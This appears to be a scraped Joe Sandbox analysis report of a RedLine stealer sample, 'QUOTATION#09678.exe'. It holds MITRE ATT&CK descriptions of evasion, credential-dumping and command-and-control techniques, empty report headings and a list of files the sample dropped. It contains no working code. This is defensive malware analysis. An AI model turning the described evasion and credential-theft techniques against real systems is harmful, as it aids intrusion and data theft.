Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION#09678.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_QUOTATION#09678._219e077cc2e4084a621b5a52d61711c854854a6_79443d72_8a6e0c61-5a37-44a8-8aed-c43c166b3102\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC11.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0D5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF114.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\regsvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5tkldmg.g5m.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oku3m0ak.wrk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkshgdx2.132.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukp3nqaj.daf.psm1

C:\Users\user\AppData\Local\Temp\tmp10CF.tmp

C:\Users\user\AppData\Local\Temp\tmp10DF.tmp

C:\Users\user\AppData\Local\Temp\tmp115D.tmp

Windows Analysis Report
QUOTATION#09678.exe